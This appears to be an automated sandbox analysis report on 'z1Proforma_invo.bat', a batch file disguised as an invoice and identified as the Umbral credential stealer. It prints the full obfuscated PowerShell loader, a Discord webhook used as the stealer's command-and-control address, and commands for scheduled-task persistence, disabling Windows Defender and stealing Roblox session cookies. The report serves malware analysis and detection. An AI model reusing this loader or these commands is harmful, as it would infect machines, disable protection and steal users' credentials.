Analysis

  • max time kernel
    138s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-07-2024 12:23

General

  • Target

    z1Proforma_invo.bat

  • Size

    232KB

  • MD5

    7ebd033260b1e54dff5afd7c6534cf33

  • SHA1

    cfb7040938237156fa3795755c77eecd7957bc39

  • SHA256

    e00bcdcd800b56caf0a0f25595a24631eacaaa1f3be35ba99e2e3af0f469ba9e

  • SHA512

    18175d028e1a0541c3c3f8221173c4e9004a14a4642bf34c6cb7ec660facb74f5c91e5ee8d8677d833cc5fe6d067ea6cb40e641524d909056b8daedc21d2682f

  • SSDEEP

    6144:FAWrhrgGAavaCnw8PaaEnyLzdyWEklez+3PDUi4WQZ5q:KWr5Mt+wezdTeK3LUi1QZM

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1263026563675455508/40rqdx690bYgnTu5DlgourQDtU8ZayQ2_Y8DutOY8G3wIW-x3nALBQHeaH44QkXBTtII

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell and hide display window.

  • Drops file in Drivers directory 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 34 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\z1Proforma_invo.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4364
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\z1Proforma_invo.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2508
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\z1Proforma_invo.bat';$sYtF='EletEUVmetEUVnttEUVAtEUVttEUV'.Replace('tEUV', ''),'LoaSBYldSBYl'.Replace('SBYl', ''),'FrogfmnmBagfmnsgfmnegfmn64gfmnStgfmnrgfmninggfmn'.Replace('gfmn', ''),'MAiuvainAiuvMoAiuvdAiuvuAiuvleAiuv'.Replace('Aiuv', ''),'CnzHHopnzHHyTonzHH'.Replace('nzHH', ''),'TJVfkranJVfksfJVfkormJVfkFinJVfkaJVfklBJVfkloJVfkcJVfkkJVfk'.Replace('JVfk', ''),'InBujdvBujdoBujdkBujdeBujd'.Replace('Bujd', ''),'EuLNintuLNiryuLNiPuLNiouLNiiuLNintuLNi'.Replace('uLNi', ''),'GetQcPVCQcPVurQcPVrenQcPVtPQcPVrocQcPVesQcPVsQcPV'.Replace('QcPV', ''),'RefRLNadfRLNLifRLNnfRLNesfRLN'.Replace('fRLN', ''),'SmNIEplimNIEtmNIE'.Replace('mNIE', ''),'DedEEtcodEEtmdEEtprdEEtesdEEtsdEEt'.Replace('dEEt', ''),'ChadhQhndhQhgedhQhExdhQhtendhQhsidhQhondhQh'.Replace('dhQh', ''),'CvNhjreavNhjtevNhjDecvNhjryvNhjptvNhjovNhjrvNhj'.Replace('vNhj', '');powershell -w hidden;function rfZro($qxWYn){$tAnYl=[System.Security.Cryptography.Aes]::Create();$tAnYl.Mode=[System.Security.Cryptography.CipherMode]::CBC;$tAnYl.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$tAnYl.Key=[System.Convert]::($sYtF[2])('MqczF3Q/W2LU3CGZkY9zS+i5Q+bJVdWYQB5O4eBge5k=');$tAnYl.IV=[System.Convert]::($sYtF[2])('m1KVoTztYUoOwoqZpe9JdA==');$dHynp=$tAnYl.($sYtF[13])();$mirwI=$dHynp.($sYtF[5])($qxWYn,0,$qxWYn.Length);$dHynp.Dispose();$tAnYl.Dispose();$mirwI;}function SfByD($qxWYn){$fdQfc=New-Object System.IO.MemoryStream(,$qxWYn);$KNfPz=New-Object System.IO.MemoryStream;$tnctE=New-Object System.IO.Compression.GZipStream($fdQfc,[IO.Compression.CompressionMode]::($sYtF[11]));$tnctE.($sYtF[4])($KNfPz);$tnctE.Dispose();$fdQfc.Dispose();$KNfPz.Dispose();$KNfPz.ToArray();}$dzSzW=[System.IO.File]::($sYtF[9])([Console]::Title);$twvSq=SfByD (rfZro ([Convert]::($sYtF[2])([System.Linq.Enumerable]::($sYtF[0])($dzSzW, 5).Substring(2))));$xLxfI=SfByD (rfZro ([Convert]::($sYtF[2])([System.Linq.Enumerable]::($sYtF[0])($dzSzW, 6).Substring(2))));[System.Reflection.Assembly]::($sYtF[1])([byte[]]$xLxfI).($sYtF[7]).($sYtF[6])($null,$null);[System.Reflection.Assembly]::($sYtF[1])([byte[]]$twvSq).($sYtF[7]).($sYtF[6])($null,$null); "
        3⤵
          PID:3948
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3596
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1160
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\z1Proforma_invo')
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1976
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 26684' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC3.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:856
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\SC3.cmd"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:4996
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\SC3.cmd"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1388
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\SC3.cmd';$sYtF='EletEUVmetEUVnttEUVAtEUVttEUV'.Replace('tEUV', ''),'LoaSBYldSBYl'.Replace('SBYl', ''),'FrogfmnmBagfmnsgfmnegfmn64gfmnStgfmnrgfmninggfmn'.Replace('gfmn', ''),'MAiuvainAiuvMoAiuvdAiuvuAiuvleAiuv'.Replace('Aiuv', ''),'CnzHHopnzHHyTonzHH'.Replace('nzHH', ''),'TJVfkranJVfksfJVfkormJVfkFinJVfkaJVfklBJVfkloJVfkcJVfkkJVfk'.Replace('JVfk', ''),'InBujdvBujdoBujdkBujdeBujd'.Replace('Bujd', ''),'EuLNintuLNiryuLNiPuLNiouLNiiuLNintuLNi'.Replace('uLNi', ''),'GetQcPVCQcPVurQcPVrenQcPVtPQcPVrocQcPVesQcPVsQcPV'.Replace('QcPV', ''),'RefRLNadfRLNLifRLNnfRLNesfRLN'.Replace('fRLN', ''),'SmNIEplimNIEtmNIE'.Replace('mNIE', ''),'DedEEtcodEEtmdEEtprdEEtesdEEtsdEEt'.Replace('dEEt', ''),'ChadhQhndhQhgedhQhExdhQhtendhQhsidhQhondhQh'.Replace('dhQh', ''),'CvNhjreavNhjtevNhjDecvNhjryvNhjptvNhjovNhjrvNhj'.Replace('vNhj', '');powershell -w hidden;function rfZro($qxWYn){$tAnYl=[System.Security.Cryptography.Aes]::Create();$tAnYl.Mode=[System.Security.Cryptography.CipherMode]::CBC;$tAnYl.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$tAnYl.Key=[System.Convert]::($sYtF[2])('MqczF3Q/W2LU3CGZkY9zS+i5Q+bJVdWYQB5O4eBge5k=');$tAnYl.IV=[System.Convert]::($sYtF[2])('m1KVoTztYUoOwoqZpe9JdA==');$dHynp=$tAnYl.($sYtF[13])();$mirwI=$dHynp.($sYtF[5])($qxWYn,0,$qxWYn.Length);$dHynp.Dispose();$tAnYl.Dispose();$mirwI;}function SfByD($qxWYn){$fdQfc=New-Object System.IO.MemoryStream(,$qxWYn);$KNfPz=New-Object System.IO.MemoryStream;$tnctE=New-Object System.IO.Compression.GZipStream($fdQfc,[IO.Compression.CompressionMode]::($sYtF[11]));$tnctE.($sYtF[4])($KNfPz);$tnctE.Dispose();$fdQfc.Dispose();$KNfPz.Dispose();$KNfPz.ToArray();}$dzSzW=[System.IO.File]::($sYtF[9])([Console]::Title);$twvSq=SfByD (rfZro ([Convert]::($sYtF[2])([System.Linq.Enumerable]::($sYtF[0])($dzSzW, 5).Substring(2))));$xLxfI=SfByD (rfZro ([Convert]::($sYtF[2])([System.Linq.Enumerable]::($sYtF[0])($dzSzW, 6).Substring(2))));[System.Reflection.Assembly]::($sYtF[1])([byte[]]$xLxfI).($sYtF[7]).($sYtF[6])($null,$null);[System.Reflection.Assembly]::($sYtF[1])([byte[]]$twvSq).($sYtF[7]).($sYtF[6])($null,$null); "
                6⤵
                  PID:2212
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  6⤵
                  • Blocklisted process makes network request
                  • Drops file in Drivers directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:3704
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3284
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\SC3')
                    7⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2848
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 26684' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC3.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2032
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:5000
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2700
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4140
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    7⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4056
                  • C:\Windows\System32\Wbem\wmic.exe
                    "wmic.exe" os get Caption
                    7⤵
                      PID:4004
                    • C:\Windows\System32\Wbem\wmic.exe
                      "wmic.exe" computersystem get totalphysicalmemory
                      7⤵
                        PID:4564
                      • C:\Windows\System32\Wbem\wmic.exe
                        "wmic.exe" csproduct get uuid
                        7⤵
                          PID:3596
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                          7⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1764
                        • C:\Windows\System32\Wbem\wmic.exe
                          "wmic" path win32_VideoController get name
                          7⤵
                          • Detects videocard installed
                          PID:3288

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

              Filesize

              3KB

              MD5

              3f01549ee3e4c18244797530b588dad9

              SHA1

              3e87863fc06995fe4b741357c68931221d6cc0b9

              SHA256

              36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

              SHA512

              73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

              Filesize

              3KB

              MD5

              0e585c3d55bf372f35f934ffca450035

              SHA1

              8ae5c63bd3875e4f2f44e23b595c671b3ab52754

              SHA256

              d42af671f764b0412f17e71804212eca451ebe5c7ce658dfd78428daccc7654a

              SHA512

              721ee0afbddb86d4d222b40ddad8892ba8501569e9b57deb2c1a78254730320cdb7ba9ac59d4bdf575fbdf034e72b2a8b7fc0b642b943e456335db07df62e0ad

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

              Filesize

              2KB

              MD5

              e4de99c1795fd54aa87da05fa39c199c

              SHA1

              dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

              SHA256

              23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

              SHA512

              796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              9d662ecae338ca923a784422a86e9925

              SHA1

              ccdbbd6f3a1801b13f503d92f5d48fe5041ab495

              SHA256

              af4b4d21aa532d4ca4638e2d3c9a07760dfeb65fbe782319860130ba09b62d6e

              SHA512

              5455380e241bd3f697a8697cac7bcce54a1dc323d33995067407bc92858bc2d2216f092cce674a87f3b2d9f34b61bb5b7b13c1b57d511f1540123d38cc7bf38e

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              66efc53ff91b80197e410958e85e5acb

              SHA1

              e83b8d736f4e00a43fb552234a2b9d5a038a453d

              SHA256

              843bc715821806bca9378c87f0dffd72da15cdaff35fcd6da5b65f8c69fe15ab

              SHA512

              86c4e1af41a0d848e4c0da33334b0289930b8e25d863c3654dc622298e8fc5359c714818c8d960ef9a7c3e1e59fb638c823a8880e86b7f5a879bff372ac0f518

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              944B

              MD5

              6d42b6da621e8df5674e26b799c8e2aa

              SHA1

              ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

              SHA256

              5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

              SHA512

              53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              948B

              MD5

              966914e2e771de7a4a57a95b6ecfa8a9

              SHA1

              7a32282fd51dd032967ed4d9a40cc57e265aeff2

              SHA256

              98d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba

              SHA512

              dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              6f28ee8df4bdf5490a8b5ebe7d6b89cf

              SHA1

              6fd0961c27a4fe119bfe43e86410917f5dc2e2e9

              SHA256

              6f64379097ea161522d22814fc0a69c0e337950826377712adceaa67d0baae51

              SHA512

              416a3977862dade1534e04f2e2e8f8c7bb794c8e2313ff104a53b622b959bd5a28e8c4346bd703f0eb1c40dc4ffc7c7c5d74c5c5d138089c1fdde9dadd5051f7

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              6eda60a88afdf7c7c83aace97cd17d70

              SHA1

              4333df3e55ab774e3d4178aada00007a8c753d39

              SHA256

              1004b5e98b5c2180df20729b5d52177d24f8b6aeb8f3adb528b2272aebcfce55

              SHA512

              4877068c8248c23da7ecddfe9a8e69a8db1d302f18cea1df0c48ef6c50f8f6276af80ad86be49a52804a3ddc49be9b28a6e47c7a43f12aa48ee607cbb12caadf

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              644c38783c7f6c2a5ddd084802b170d4

              SHA1

              40596f06a35c639e3f5e65ebe61ba69c98fba5c0

              SHA256

              87afca344ea480042c739717336bef808be1f32ba1e83e867b8f0459053adde5

              SHA512

              135ee3be69ef3ccc2cd521c89f51d83df12cbd0638f3918df6422790f6bf40c18d8bc92c00b61b898335ca98c2ef4a7956ea12f5d02846a9f5f7d1ec81ad2e0d

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              8eb06951b48b364432a3757eec6bd5af

              SHA1

              df0b71da69535d6b846c4fb151756205a94a661e

              SHA256

              da759628424de3646d7031abfc03a213b72a8d9a2e2fce1f5c643faf86519c97

              SHA512

              2764e05a7297577eab32263c578ac76acfeccbf019757bc6c94c975af22014f563f180ccda4a12751756b412e269b57ddca1f2b1362c8acaaef7962b6e4edb0c

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dwte1wgd.sut.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Roaming\SC3.cmd

              Filesize

              232KB

              MD5

              7ebd033260b1e54dff5afd7c6534cf33

              SHA1

              cfb7040938237156fa3795755c77eecd7957bc39

              SHA256

              e00bcdcd800b56caf0a0f25595a24631eacaaa1f3be35ba99e2e3af0f469ba9e

              SHA512

              18175d028e1a0541c3c3f8221173c4e9004a14a4642bf34c6cb7ec660facb74f5c91e5ee8d8677d833cc5fe6d067ea6cb40e641524d909056b8daedc21d2682f

            • memory/1160-29-0x00007FFDBBAB0000-0x00007FFDBC571000-memory.dmp

              Filesize

              10.8MB

            • memory/1160-24-0x00007FFDBBAB0000-0x00007FFDBC571000-memory.dmp

              Filesize

              10.8MB

            • memory/1160-25-0x00007FFDBBAB0000-0x00007FFDBC571000-memory.dmp

              Filesize

              10.8MB

            • memory/1160-26-0x00007FFDBBAB0000-0x00007FFDBC571000-memory.dmp

              Filesize

              10.8MB

            • memory/3596-94-0x00007FFDBBAB0000-0x00007FFDBC571000-memory.dmp

              Filesize

              10.8MB

            • memory/3596-33-0x0000014C7ECE0000-0x0000014C7ED0C000-memory.dmp

              Filesize

              176KB

            • memory/3596-1-0x0000014C7E930000-0x0000014C7E952000-memory.dmp

              Filesize

              136KB

            • memory/3596-11-0x00007FFDBBAB0000-0x00007FFDBC571000-memory.dmp

              Filesize

              10.8MB

            • memory/3596-12-0x00007FFDBBAB0000-0x00007FFDBC571000-memory.dmp

              Filesize

              10.8MB

            • memory/3596-30-0x0000014C7E980000-0x0000014C7E992000-memory.dmp

              Filesize

              72KB

            • memory/3596-32-0x00007FFDD81A0000-0x00007FFDD825E000-memory.dmp

              Filesize

              760KB

            • memory/3596-31-0x00007FFDD9B30000-0x00007FFDD9D25000-memory.dmp

              Filesize

              2.0MB

            • memory/3596-13-0x0000014C7ED30000-0x0000014C7ED74000-memory.dmp

              Filesize

              272KB

            • memory/3596-0-0x00007FFDBBAB3000-0x00007FFDBBAB5000-memory.dmp

              Filesize

              8KB

            • memory/3596-14-0x0000014C7EE00000-0x0000014C7EE76000-memory.dmp

              Filesize

              472KB

            • memory/3704-130-0x0000027CAD230000-0x0000027CAD280000-memory.dmp

              Filesize

              320KB

            • memory/3704-131-0x0000027CAD280000-0x0000027CAD29E000-memory.dmp

              Filesize

              120KB

            • memory/3704-106-0x0000027CAD190000-0x0000027CAD1D0000-memory.dmp

              Filesize

              256KB

            • memory/3704-81-0x00007FFDD9B30000-0x00007FFDD9D25000-memory.dmp

              Filesize

              2.0MB

            • memory/3704-168-0x0000027CAD2F0000-0x0000027CAD302000-memory.dmp

              Filesize

              72KB

            • memory/3704-167-0x0000027CAD2C0000-0x0000027CAD2CA000-memory.dmp

              Filesize

              40KB

            • memory/3704-82-0x00007FFDD81A0000-0x00007FFDD825E000-memory.dmp

              Filesize

              760KB

            • memory/3704-80-0x0000027C94300000-0x0000027C94312000-memory.dmp

              Filesize

              72KB